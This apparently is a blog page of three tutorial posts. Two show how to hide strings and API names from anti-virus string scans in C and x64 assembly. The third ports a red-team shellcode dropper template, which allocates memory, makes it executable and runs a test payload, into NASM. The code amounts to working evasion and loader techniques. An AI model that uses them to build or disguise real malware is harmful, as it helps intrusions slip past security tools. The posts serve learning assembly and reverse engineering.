String anti-virus evasion in x64 assembly (Part 2)

In my last blog post, I discussed a way to hide parameter strings from being detected by an anti-virus. The solution was simple and it worked. However, it was incomplete as strings of function calls and loaded DLLs were still detectable in memory.

string-anti-virus-evasion-in-x64-assembly-part-2-01

In this post I'll be talking about the other technique from the same blog post we were following before. It does a good job of explaining the concept which I'll be covering here too. I will also be writing the code in assembly as an added bonus, so we can better understand what goes on under the hood.

The problem

Let's revisit our code from the last time. We have two functions being called ShellExecuteA and ExitProcess.

#include <windows.h>
#include <shellapi.h>

int main(void)
{
    char ca_notepad[] = { 'n','o','t','e','p','a','d',0 };
    ShellExecuteA(0, "open", ca_notepad, NULL, NULL, SW_SHOW);

    ExitProcess(0);
}

Upon compiling the program, the compiler takes the list of all functions used and places them in the executable (In this case, in the .rdata segment) as a readable string:

string-anti-virus-evasion-in-x64-assembly-part-2-07

A function name like ShellExecuteA will be sure to raise some eyebrows so we do not want it to be detectable. To hide this we need to do load the DLL at runtime by using LoadLibrary and GetProcAddress.

Coding in C

LoadLibrary accepts a string containing the DLL that we want to load.

    HANDLE hShell32 = LoadLibrary("shell32.dll");

This loads the DLL's code into memory and returns a handle to that location. We can see the result of this when we look at the memory map in a debugger. Here's the memory map prior to calling LoadLibrary:

string-anti-virus-evasion-in-x64-assembly-part-2-03

And here's what it looks like after:

string-anti-virus-evasion-in-x64-assembly-part-2-04

The LoadLibrary API loaded shell32.dll along with it's dependencies into memory. We can also see that it automatically handled where the new DLLs will be placed. In this case, in between pre-existing ones.


Aside: How do we know which DLL is needed?

We can find out which DLL is needed by a function by looking at it's MSDN documentation. Scroll at the end of every function documentation to see the "Requirements" section that lists the DLL that it needs.

string-anti-virus-evasion-in-x64-assembly-part-2-02


LoadLibrary then returns a HANDLE object which we can then pass to GetProcAddress.

    _ShellExecuteA fShellExecuteA = (_ShellExecuteA) GetProcAddress(hShell32, "ShellExecuteA");

GetProcAddress looks through the library we loaded and returns the address of the ShellExecuteA function. This address needs to be cast to a typedef first before it can be called. This means we need to know the structure of the typedef, which we can determine by looking at the "Syntax" section in MSDN.

Here's the syntax for ShellExecuteA according to its documentation:

HINSTANCE ShellExecuteA(
  [in, optional] HWND   hwnd,
  [in, optional] LPCSTR lpOperation,
  [in]           LPCSTR lpFile,
  [in, optional] LPCSTR lpParameters,
  [in, optional] LPCSTR lpDirectory,
  [in]           INT    nShowCmd
);

And here's our typedef implementation:

typedef HINSTANCE (*_ShellExecuteA) (
    HWND   hwnd,
    LPCSTR lpOperation,
    LPCSTR lpFile,
    LPCSTR lpParameters,
    LPCSTR lpDirectory,
    INT    nShowCmd
);

When everything is setup properly, the variable fShellExecuteA can now be used as a function.

    fShellExecuteA(0, "open", ca_notepad, NULL, NULL, SW_SHOW);

Combining these together, this is what our code will look like:

#include <windows.h>

typedef HINSTANCE (*_ShellExecuteA) (
    HWND   hwnd,
    LPCSTR lpOperation,
    LPCSTR lpFile,
    LPCSTR lpParameters,
    LPCSTR lpDirectory,
    INT    nShowCmd
);

int main(void)
{
    HANDLE hShell32 = LoadLibrary("shell32.dll");
    _ShellExecuteA fShellExecuteA = (_ShellExecuteA) GetProcAddress(hShell32, "ShellExecuteA");

    char ca_notepad[] = { 'n','o','t','e','p','a','d',0 };
    fShellExecuteA(0, "open", ca_notepad, NULL, NULL, SW_SHOW);

    ExitProcess(0);
}

This is not yet done, however, as strings.exe can still detect our strings. This is because we now have strings "shell32.dll" and "ShellExecuteA" as parameters for LoadLibrary and GetProcAddress. And these are placed in the .data segment in memory.

string-anti-virus-evasion-in-x64-assembly-part-2-05

This is where we can use the technique that we used in part 1. By declaring the string as an array as a local variable, the data is placed on the stack instead of in the .data segment.

Applying this technique gives us the following:

    char ca_shell32[] = { 's','h','e','l','l','3','2','.','d','l','l', 0 };
    HANDLE hShell32 = LoadLibrary(ca_shell32);

    char ca_shellExA[] = { 'S','h','e','l','l','E','x','e','c','u','t','e','A', 0 };
    _ShellExecuteA fShellExecuteA = (_ShellExecuteA) GetProcAddress(hShell32, ca_shellExA);

And now we can see that it works!

string-anti-virus-evasion-in-x64-assembly-part-2-06

Converting to assembly

As promised, we'll be converting the code above into x64 windows assembly. It's an extra step, but can give us a better understanding by approaching it from a different programming language.

Starting from the beginning, we'll be using LoadLibraryA and GetProcAddress to dynamically load the ShellExecuteA function at runtime.

If we fast forward a bit, here's what we'll end up with:

    lea rcx, [str_shell32]     ; Load "shell32.dll" string
    sub rsp, 32
    call    LoadLibraryA       ; Call "LoadLibraryA"
    add rsp, 32

    mov rcx, rax               ; Save result of LoadLibraryA to rcx
    lea rdx, [str_shexa]       ; Load "ShellExecuteA" string
    sub rsp, 32
    call    GetProcAddress     ; Call "GetProcAddress"
    add rsp, 32

    mov rbx, rax               ; The address of "ShellExecuteA" is saved to rbx
    ...                        
    ... 
    call    rbx                ; Call "ShellExeecuteA"

Wait, that's it? Yes!

This is the one of those rare moments that the Assembly code is more straightforward than C. This is because the value returned by GetProcAddresss is already an address. Since assembly deals with memory addresses, there's no need for any conversion like we did in the C version. The address can be called directly.

And just like the previous one, the code above is still not complete. The "shell" strings are still visible via strings.exe so we need to apply the technique again from Part 1. I won't be showing it step by step here anymore as it's quite lengthy.

This means that this example piece of code:

    lea rcx, [str_shell32]     ; Load "shell32.dll" string
    sub rsp, 32
    call    LoadLibraryA       ; Call "LoadLibraryA"
    add rsp, 32

Will now be like this:

    sub rsp, 16          ; Place "shell32.dll" string to the stack
    addstr2stack "s", "h", "e", "l", "l", "3", "2", ".", "d", "l", "l", 0x0 
    lea rcx, [rsp]

    sub rsp, 32
    call    LoadLibraryA ; Call "LoadLibraryA"
    add rsp, 32

addstr2stack is a macro we've written before in part 1. It makes declaring an string array easier.

Combining everything again, here's the final assembly code with comments:

    push    rbp
    mov     rbp, rsp
    sub rsp, 32

    ;; = START LOADLIBRARY ===========================================

    sub rsp, 16         ; Place "shell32.dll" string to the stack
    addstr2stack "s", "h", "e", "l", "l", "3", "2", ".", "d", "l", "l", 0x0 
    lea rcx, [rsp]

    sub rsp, 32
    call    LoadLibraryA ; Call LoadLibraryA
    add rsp, 32

    add rsp, 16         ; Release "shell32.dll" string from stack

    ;; = END LOADLIBRARY ===========================================


    ;; = START GETPROCADDRESS ===========================================

    mov rcx, rax        ; Save value to rcx (1st parameter register)

    sub rsp, 16         ; Place "ShellExecuteA" string to the stack
    addstr2stack "S", "h", "e", "l", "l", "E", "x", "e", "c", "u", "t", "e", "A", 0x0
    lea rdx, [rsp]

    sub rsp, 32
    call    GetProcAddress  ; Call GetProcAddress
    add rsp, 32

    add rsp, 16         ; Release "ShellExecuteA" from stack

    ;; = END GETPROCADDRESS ===========================================


    ;; = START SHELLEXECUTEA ===========================================

    mov r12, rax        ; Save address of "ShellExecuteA" to r12 (To be called later)

    sub rsp, 16         ; Place "notepad" string to the stack
    addstr2stack "n", "o", "t", "e", "p", "a", "d", 0x0
    lea r8, [rsp]

    push    0x5
    push    0x0
    xor r9, r9

    lea rdx, [msg_open] 
    xor rcx, rcx

    sub rsp, 32
    call    r12         ; Call "ShellExecuteA", jump to addres
    add rsp, 32

    add rsp, 16         ; Release "notepad" string from stack

    ;; = END SHELLEXECUTEA ===========================================

    xor     rax, rax
    call    ExitProcess

I know there's a lot to digest with the code above. I've made the flow similar to the flow of the C program so you can review them side by side if you feel lost. Hopefully, the comments and the separators would also help.

Note: Pay special attention to how the stack is reserved (with sub rsp, 16) and released (with add rsp, 16). I did not discuss stack alignments as it's a lengthy explanation in itself. But just remember that we are releasing the data once we've finished passing it to the function.

If done correctly, the strings would not be detectable because the data is now on the stack and not in the .data segment.

string-anti-virus-evasion-in-x64-assembly-part-2-06


It is important to note that anti-viruses can employ different techniques to do detection, but a huge part of their functionality will rely on detecting malicious strings. So at least, on that front, we now have an idea on how to defeat it.

You can view the code for part 1 and 2 on Github. Updates and fixes will be placed there.

I might post more assembly shenanigans in the future, so stay tuned.

And as always, for any questions or comments, feel free to reach out to me on Twitter or LinkedIn.

String anti-virus evasion in x64 assembly (Part 1)

One of the features I implemented for my Remote Access Tool was an anti-virus evasion capability in the form of strings obfuscation. It wouldn't fool an EDR or a reverse engineer but it was quick to implement so I added it.

This was over a year ago. I decided to revisit this feature to try and understand it better and find out if it is actually effective.

What to expect

In this two-part blog post I will look into the following:

  • Hiding argument strings
  • Hiding API call strings

THe one you reading now is about the first one. I will be explaining how it's done in C and later convert it to x64 Windows Assembly so we can better understand what's happening under the hood.

Hiding function argument strings

I got the idea for this AV evasion technique from this blog post. The author posits that one part of an anti-virus detection capability is through checking for suspicious strings in an executable.

For the purpose of this post, let's pretend that "notepad" is a suspicious string that we don't want be detected by the anti-virus.

#include <windows.h>
#include <shellapi.h>

int main(void)
{
    ShellExecute(0, "open", "notepad", NULL, NULL, SW_SHOW);
}

You might think that a call to ShellExecute is already a big red flag, and you are right. It is! But we'll talk about hiding API calls on the next post. Let's focus on the parameter for now.

In the place of the anti-virus, we'll be using the strings command to check for visible strings like so:

string-anti-virus-evasion-in-x64-assembly-part-1-01

As expected, the word "notepad" is easily detected. This is becaues any string that we declare and initialize in a program gets placed in the .data segment in memory by the compiler:

string-anti-virus-evasion-in-x64-assembly-part-1-02

To prevent detection, we need a way for the string to not be present in our compiled executable.

The solution

The solution is to declare the string to be passed as the parameter like so:

    char ca_notepad[] = { 'n','o','t','e','p','a','d', 0 };
    ShellExecute(0, "open", ca_notepad, NULL, NULL, SW_SHOW);

And when strings is run, we now see that the "notepad" string is not present anymore.

string-anti-virus-evasion-in-x64-assembly-part-1-03

How did this happen?

This is because data contained in arrays are placed on the stack instead of the .data segment when declared within a function (And also, as long as it is not declared as static).

To further understand how this happens, let's convert this C program into x64 assembly.

Converting to x64 assembly

First, we setup our boilerplate code with an entry point and a call to ExitProcess.

    bits 64
    default rel

segment .text
    global main
    extern ExitProcess

main:
    push    rbp
    mov     rbp, rsp

    xor     rax, rax
    call    ExitProcess

Before we can call ShellExecute, we first need to import the ShellExecuteA symbol using extern.

segment .text
    ...
    extern ExitProcess
    extern ShellExecuteA

Aside: Why ShellExecuteA and not ShellExecute?

Because if you would look in the MSDN documentation, you would find that there really isn't a ShellExecute function available. There are ShellExecuteA (For ANSI strings) and ShellExecuteW (For Unicode strings), however. ShellExecute is just a macro for these two functions. We can confirm this by looking at the shellapi.h source code.

#ifdef UNICODE
#define ShellExecute  ShellExecuteW
#else
#define ShellExecute  ShellExecuteA
#endif // !UNICODE

Since assembly does not use header files we can just call ShellExecuteA or ShellExecuteW directly. In this example, we won't be needing unicode support so we're going to be using the former.


Before we call the function in assembly, let's go back and take a look at how we did it in C.

ShellExecute(0, "open", "notepad", NULL, NULL, SW_SHOW);

We have 5 paremeters to pass to the function. Here's how we can write this in assembly using the Microsoft x64 calling conventions.

    push    0x5              ; nShowCmd ; SW_SHOW == 0x5
    push    0x0              ; lpDirectory ; NULL == 0x0
    xor r9, r9               ; lpParameters ; Clear register == NULL

    lea r8, [msg_notepad]    ; lpFile
    lea rdx, [msg_open]      ; lpOperation

    xor rcx, rcx             ; hwnd

    sub rsp, 32
    call    ShellExecuteA    ; Call function
    add rsp, 32

We then initialize the strings by adding a data segment section:

segment .data
    msg_open    db  "open", 0
    msg_notepad db  "notepad", 0

For reference, here is our full code so far:

    bits 64
    default rel

segment .data
    msg_open    db  "open", 0
    msg_notepad db  "notepad", 0

segment .text
    global main
    extern ExitProcess
    extern ShellExecuteA

main:
    push    rbp
    mov     rbp, rsp

    push    0x5
    push    0x0
    xor r9, r9

    lea r8, [msg_notepad]
    lea rdx, [msg_open] 
    xor rcx, rcx    

    sub rsp, 32
    call    ShellExecuteA
    add rsp, 32

    xor     rax, rax
    call    ExitProcess

Take note that this version of the code is still the one where the "notepad" string is detectable.

To hide this string we need to apply the same solution we did to our C code; which is to place the data on the stack so that it would not be placed in the .data segment.

Here is how we did it in C:

    char ca_notepad[] = { 'n','o','t','e','p','a','d', 0 };
    ShellExecute(0, "open", ca_notepad, NULL, NULL, SW_SHOW);

And here is how to do it in assembly:

    sub rsp, 8             ; Reserve space on stack for string
    mov byte [rsp], "n"
    mov byte [rsp+1], "o"
    mov byte [rsp+2], "t"
    mov byte [rsp+3], "e"
    mov byte [rsp+4], "p"
    mov byte [rsp+5], "a"
    mov byte [rsp+6], "d"
    mov byte [rsp+7], 0x0   
    lea r8, [rsp]          ; Load address of string to r8
    add rsp, 8             ; Reclaim space

Here's a summary of the the above code:

  • Since our string is 8 characters long (Including the 0x0 or NULL terminator), we reserve space on the stack with sub rsp, 8.
  • Each character is then placed individually in the reserved space using move byte while adding an offset to rsp.
  • The address pointed to by rsp is then loaded to the r8 register (This holds our 3nd parameter).
  • We reclaim our reserved space using add rsp, 8.

After the code above, r8 would now point to the location in the stack where our string resides:

string-anti-virus-evasion-in-x64-assembly-part-1-04


Aside: What if we have longer strings?

If we have a longer string like "powershell", then we need to reserve more space on the stack. Take note, however that when reserving space we need to maintain the stack alignment so we add and subtract by multiples of 8. The "powershell" string has 11 characters so we use 16.

    sub rsp, 16
    mov byte [rsp], "p"
    mov byte [rsp+1], "o"
    mov byte [rsp+2], "w"
    mov byte [rsp+3], "e"
    mov byte [rsp+4], "r"
    mov byte [rsp+5], "s"
    mov byte [rsp+6], "h"
    mov byte [rsp+7], "e"
    mov byte [rsp+8], "l"
    mov byte [rsp+9], "l"
    mov byte [rsp+10], 0x0

    lea r8, [rsp]
    add rsp, 16

With this final version of the code, "notepad" will not be visible to strings anymore.

Here is our final code:

    bits 64
    default rel

segment .data
    msg_open    db  "open", 0

segment .text
    global main
    extern ExitProcess
    extern ShellExecuteA

main:
    push    rbp
    mov     rbp, rsp

    push    0x5
    push    0x0
    xor r9, r9

    sub rsp, 8
    mov byte [rsp], "n"
    mov byte [rsp+1], "o"
    mov byte [rsp+2], "t"
    mov byte [rsp+3], "e"
    mov byte [rsp+4], "p"
    mov byte [rsp+5], "a"
    mov byte [rsp+6], "d"
    mov byte [rsp+7], 0x0   
    lea r8, [rsp]
    add rsp, 8

    lea rdx, [msg_open] 
    xor rcx, rcx    

    sub rsp, 32
    call    ShellExecuteA
    add rsp, 32

    xor     rax, rax
    call    ExitProcess

Hiding at scale

Writing the code above can get a little tedious especially if we want to pass a really long string. Thankfully, we can use a macro like the one I've written below:

%macro  addstr2stack    1-*
    %assign i 0
    %assign j 0
    %rep    %0
        mov byte [rsp+i+8*j], %1
        %assign i i+1
        %rotate 1

        %if i >= 8
            %assign j j+1
            %assign i 0
        %endif
    %endrep
%endmacro

What the macro does is that it loops through each character and places it into the correct position on the stack.

Important note: When reserving space on the stack, make sure it is in multiples of 16! This is because the stack has a 16-bit boundary for stack alignment!

For example, if our string has 10 characters, we only need to reserve 16 bytes. If our character is 20 characters long, we'd have to reserve 32 bytes.

This macro can then be called like this:

    sub rsp, 16        ; Reserve space for the string on the stack
    addstr2stack "n", "o", "t", "e", "p", "a", "d", 0x0
    lea r8, [rsp]
    ...
    add rsp, 16        ; After use, release the space

Here is what the result of the macro looks like in the debugger:

string-anti-virus-evasion-in-x64-assembly-part-1-05

For the full source code visit the repo on Github. Updates and fixes to the code will be pushed there.


So there you have it, we were able to successfully hide strings by changing the way how the data is declared and placed in memory. If you think about it, the technique is very simple.

However, we've only seen it used against the strings command. Can it evade an actual anti-virus? The answer is probably no. In my next post I'll be talking about API call obfuscation that would help hide functions like ShellExecute.

Edit: Part 2 here

. Also, for any questions or comments, feel free to reach out to me on Twitter or LinkedIn.

Converting a malware dropper to x64 assembly

In this post I'll be listing down lessons I learned while converting a simple malware dropper written in C to x64 assembly.

I started this project as a way to deepen my understanding of assembly so I could be better in malware development and reverse engineering (And also because I love coding in assembly and would always find an excuse to use it).

What to expect

I'll be going through sections of the C file and show the how it can be written accordingly in x64 Windows assembly. Take note, however, that the conversion is not one-to-one, meaning there are other ways of writing it. What I did was to structure the assembly code so that you can easily compare it with the C code while making sure that the end result will be the same.

I won't be covering the basics of assembly because this post does a better job of doing that. And as for the assembler, I'll be using nasm because this is the one I'm most familiar with.

Disclaimer: I am not an expert in any of these topics. I'm just someone who learned things and wish to share it to others. If I'm wrong about anything feel free to point it out.

Credits

The malware dropper that we'll be converting is made by @reenz0h. I found it in kymb0's repository and I learned that it's a part of the Red Team Operator course by Sektor7. I've read good things about the course and I plan to take it in the future, you should check it out too.

The dropper

Here's the malware dropper that we'll be converting:

/*

 Red Team Operator course code template
 storing payload in .data section

 author: reenz0h (twitter: @sektor7net)

*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// 4 byte payload
unsigned char payload[] = {
    0x90,       // NOP
    0x90,       // NOP
    0xcc,       // INT3
    0xc3        // RET
};
unsigned int payload_len = 4;

int main(void) {

    void * exec_mem;
    BOOL rv;
    HANDLE th;
    DWORD oldprotect = 0;

    // Allocate a memory buffer for payload.
    exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    printf("%-20s : 0x%-016p\n", "payload addr", (void *)payload);
    printf("%-20s : 0x%-016p\n", "exec_mem addr", (void *)exec_mem);

    // Copy payload to new buffer
    RtlMoveMemory(exec_mem, payload, payload_len);

    // Make new buffer as executable
    rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);

    printf("\nHit me!\n");
    getchar();

    // If all good, run the payload
    if ( rv != 0 ) {
            th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
            WaitForSingleObject(th, -1);
    }

    return 0;
}

Here is what the code does:

  • Allocates memory buffer with size payload_len
  • Copies payload to the buffer
  • The buffer's memory protection is changed to PAGE_EXECUTE_READ which allows for code execution
  • A thread is created that runs the payload, which runs indefinitely

It doesn't seem that the program is doing much when run. All we see are the payload and exec_mem addresses for debugging purposes and nothing much else.

converting-a-malware-dropper-to-x64-assembly-01

The most interesting parts with this code will be seen under a debugger, which I'll go through later in this post.

Including external functions

In C, if we want to to use a Windows API function, we need to include the necessary header files and make sure to supply required library names via the linker, like so:

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

x64 assembly does not use header files so the process is done differently. First, the necessary ".lib" files should be supplied to the linker:

link dropper_data.obj /subsystem:console /out:dropper_data.exe kernel32.lib msvcrt.lib

Next, every external function that we'll be using in our code needs to be specified as shown below:

segment .text
    global main
    extern ExitProcess
    extern printf
    extern VirtualAlloc
    extern VirtualProtect
    extern RtlMoveMemory
    extern getchar
    extern CreateThread
    extern WaitForSingleObject

Note that the extern keyword in assembly is different in C. Externs in C are used for exporting symbols while they are used for importing symbols in Assembly. global is the one used for exporting.

Once the symbols are properly exported then that is when the functions can be used with the call operand.

The entrypoint

There needs to be an entry point so that the operating system knows where to jump to start our program. We do this in C by declaring a main function:

int main(void) {
    ...
}

In assembly, we declare the entry point with global main (As seen in the previous section) and also supply the main: label within the code. This is where execution will jump to.

segment .text
   global main
   ...
   ...

main:
   push    rbp
   ...
   ...

The payload

The payload in this example is a simple shellcode made for testing purposes. This can be changed to any shellcode of any length as long as payload_len reflects the new size of the shellcode.

// 4 byte payload
unsigned char payload[] = {
    0x90,       // NOP
    0x90,       // NOP
    0xcc,       // INT3
    0xc3        // RET
};
unsigned int payload_len = 4;

In assembly, initializing data is done in segment .data.

segment .data
    ...
    ...
    ;; 4 byte payload
    payload         db  0x90, 0x90, 0xCC, 0xC3
    payload_len     db  4

We can then check the above data laid out in the .data memory segment using a debugger:

converting-a-malware-dropper-to-x64-assembly-02

converting-a-malware-dropper-to-x64-assembly-03

You may notice that our shellcode is not at the start of the .data segment because there are other data that was declared prior to our payload. This is important to note as the order we declare the data will be the order they will appear in memory.

Initialized data

All data in assembly needs to be declared and initialized before it can be used:

segment .data
    msg_hello       db  "Hello world!", 0xd, 0xa, 0
    msg_exec_addr   db  "exec_mem addr", 0
    msg_pload_addr  db  "payload addr", 0   
    msg_format      db  "%-20s : 0x%-016p", 0xd, 0xa, 0
    msg_hit_me      db  "Hit me!", 0xd, 0xa, 0

    ...
    ...
    lea rcx, [msg_format]
    lea rdx, [msg_pload_addr]
    ...
    call    printf
    ...

This is optional in C as you can pass data (like a string) directly to a function without adding it to a variable:

printf("%-20s : 0x%-016p\n", "payload addr", (void *)payload);
printf("%-20s : 0x%-016p\n", "exec_mem addr", (void *)exec_mem);

However, under the hood, the C compiler actually places these data on the .data segment for you automatically. If you were to compile and run the C program you would see that the strings are in the .data segment.

Uninitialized data

Memory of certain sizes can be reserved so that it can be used later in a program. These unitialized data is declared not in a .data segment but in a .bss segment (more here).

segment .bss    
    exec_mem    resb    8
    old_protect resb    8

Nasm provides specific "pseudo-instructions" for declaring unitialized data like resb (reserve byte), resw (reserve word), and so on.

Alternatively, this can be written like this:

segment .bss    
    exec_mem        db  8 dup (?)   ; Reserve 8 bytes of ? null value
    old_protect     dq  1           ; DQ = QWORD

It would still work but NASM doesn't like it and would throw a warning.

dropper_data.asm:18: warning: attempt to initialize memory in BSS section `.bss': ignored [-w+other]

The memory for the uninitialized data won't be reserved until the program is loaded. Once it is, we can see the reserved memory in the .data segment.

Any data we move to the previously unitialized data can now be seen from a debugger. See below for an example:

    mov [exec_mem], rax  ; Move "000001F96E100000" to memory

converting-a-malware-dropper-to-x64-assembly-04

Shadow Spaces

When calling a function in x64 Windows assembly, programmers must keep in mind to reserve a "shadow space" before doing a call to an external function that is in another language like C or C++. For example:

    sub     rsp, 32 
    call    getchar
    add     rsp, 32

But what is a shadow space? Here is a quick explanation:

The shadow space is the mandatory 32 bytes (4x8 bytes) you must reserve for the called procedure. It just means you must provide 32 bytes on the stack before calling.

It can be used by compilers to leave a copy of the register values on the stack for later inspection in the debugger. It is meant to be used to make debugging x64 easier.

So in the code above, sub rsp, 32 reserves the shadow space before getchar is called. The space on the stack is highlighted in the image below.

converting-a-malware-dropper-to-x64-assembly-05

call getchar then executes and the "shadow space" gets filled.

converting-a-malware-dropper-to-x64-assembly-06

As the caller, we really do not care about the data that gets placed in the shadows space. So after calling the functions we do add rsp, 32 to reclaim the shadow space.

You'll find out the importance of properly reserving and releasing a shadow space especially if you are relying on the stack for saving local variables. Here is a segment of the code where I found out first-hand the importance of handling the shadow space.

    push    rax                ;; I need rax for later so I pushed it on the stack

    lea     rcx, [msg_hit_me]
    call    printf             ;; printf was expecting a shadow space so it just wrote onto the stack, overwriting the value from RAX before

    call    getchar            ;; getchar did the same too

    pop rax                    ;; The value saved by rax is overwritten

Simply handling the shadow space avoided this problem:

    push    rax

    lea     rcx, [msg_hit_me]
    sub     rsp, 32            ;; shadow space is reserved
    call    printf             ;; printf can write to the stack without overwriting data that I need
    add     rsp, 32            ;; shadow space is released

    sub     rsp, 32            ;; shadow space is reserved
    call    getchar            ;; same goes with getchar
    add     rsp, 32            ;; shadow space is released

    pop rax                    ;; I got the correct value from rax that I pushed

The above code can be further optimized by only releasing the shadow space after both call to printf and getchar, as shown below:

    push    rax

    lea     rcx, [msg_hit_me]
    sub     rsp, 32            ;; shadow space is reserved
    call    printf             ;; printf can write to the stack without overwriting data that I need

    call    getchar            ;; same goes with getchar
    add     rsp, 32            ;; shadow space is released

    pop rax                    ;; I got the correct value from rax that I pushed

However, there might come a time when the code will change and you might forget to re-add the code that releases and reserves the shadow space. This may lead to hard-to-find stack related problems. To avoid this, just make it a habit to reserve and release the shadow space every time an external function is called.

As an alternative, you can use a routine that could reserve and release the shadow space automatically like the one below:

shadow_call:
    pop rbx         ; Get the return address pointer in a non-volitile register
    sub rsp, 20h    ; Add the shadow space
    call rax        ; Call the function
    add rsp, 20h    ; Remove the shadow space
    jmp rbx         ; Go back to the stored instruction address
    ret

To call the routine, just do this:

    mov rax, getchar
    call    shadow_call

But honestly, I think it's less complicated to just do the handling of shadow space yourself.

Shadow spaces threw me off a bit when I was researching about this, but everything I said above should be enough of an explanation. If however you want more then go here and then here.

Microsoft x64 Calling Convention

It is also important to note that the calling convention for functions is different for Windows compared to other operating systems.

As a quick reference, if you are going to pass parameters to a function you need to use registers rcx, rdx, r8, and r9 for the first, second, third, and fourth parameters respectively.

Here's an example from our code:

    // Make new buffer as executable
    rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);

In assembly, we supply the parameters like so:

    ;; Make new buffer as executable
    mov rcx, [exec_mem]      ;; First parameter
    xor rdx, rdx
    mov dl, [payload_len]    ;; Second parameter
    mov r8, 0x20             ;; Third parameter
    xor r9, r9
    lea r9, [old_protect]    ;; Fourth parameter
    sub     rsp, 32          ;; Reserve shadow space
    call    VirtualProtect   ;; Call function
    add     rsp, 32          ;; Release shadow space

For functions that require more than four parameters, the stack needs to be utilized. This can get confusing so let me point you to this post as it has diagrams for visualization.

The final code

The rest of the code can be converted using the concepts I've described above. Here is the fully converted code:

    bits 64
    default rel

segment .data
    msg_hello   db  "Hello world!", 0xd, 0xa, 0
    msg_exec_addr   db  "exec_mem addr", 0
    msg_pload_addr  db  "payload addr", 0   
    msg_format  db  "%-20s : 0x%-016p", 0xd, 0xa, 0
    msg_hit_me  db  "Hit me!", 0xd, 0xa, 0

    ;; 4 byte payload
    payload     db  0x90, 0x90, 0xCC, 0xC3
    payload_len     db  4

segment .bss    
    exec_mem    resb    8
    old_protect resb    8   

segment .text
    global main
    extern ExitProcess
    extern printf
    extern VirtualAlloc
    extern VirtualProtect
    extern RtlMoveMemory
    extern getchar
    extern CreateThread
    extern WaitForSingleObject

main:
    push    rbp
    mov     rbp, rsp

    ;; Allocate a memory buffer for payload.
    mov rcx, 0
    xor rdx, rdx
    mov dl, [payload_len]
    mov r8, 0x3000
    mov r9, 0x4
    sub     rsp, 32 
    call    VirtualAlloc
    add     rsp, 32 

    mov [exec_mem], rax

    lea     rcx, [msg_format]
    lea rdx, [msg_pload_addr]
    lea r8, payload
    sub     rsp, 32 
    call    printf
    add     rsp, 32 

    lea     rcx, [msg_format]
    lea rdx, [msg_exec_addr]
    mov r8, [exec_mem]
    sub     rsp, 32

    call    printf
    add     rsp, 32 

    ;; Copy payload to new buffer
    mov rcx, [exec_mem]
    lea rdx, [payload]
    xor r8, r8
    mov r8b, [payload_len]
    sub     rsp, 32     
    call    RtlMoveMemory
    add     rsp, 32 

    ;; Make new buffer as executable
    mov rcx, [exec_mem]
    xor rdx, rdx
    mov dl, [payload_len]
        mov r8, 0x20
    xor r9, r9
    lea r9, [old_protect]
    sub     rsp, 32     
    call    VirtualProtect
    add     rsp, 32

    push    rax

    lea     rcx, [msg_hit_me]
    sub     rsp, 32         
    call    printf
    add     rsp, 32 

    sub     rsp, 32             
    call    getchar
    add     rsp, 32

    pop rax

    ;; If all good, run the payload 
    jz  ifrvzero

    xor rcx, rcx
    xor rdx, rdx
    mov r8, [exec_mem]
    xor r9, r9
    push    r9
    push    r9
    call    CreateThread

    mov rcx, rax
    mov rdx, 0xFFFFFFFF
    call    WaitForSingleObject

ifrvzero:

    xor     rax, rax
    call    ExitProcess

As mentioned before, I did my best to match the structure of the C code to the assembly code to make it easy to compare how one section was translated to the other. There are other parts like the jz ifrvzero conditonal jump that I didn't discuss, but those can be easily be understood if you know the basics in assembly.

I've also uploaded the code on it's own repository here. Updates and fixes to the code will be pushed there.


A lot of the concepts I've described in this post were the lessons I learned while working on this project. Most of these can be researched but I'm hoping that collecting them in one location would benefit the next bloke who is crazy like me to do the same.

Feel free to reach out to me on Twitter or LinkedIn for any questions or comments.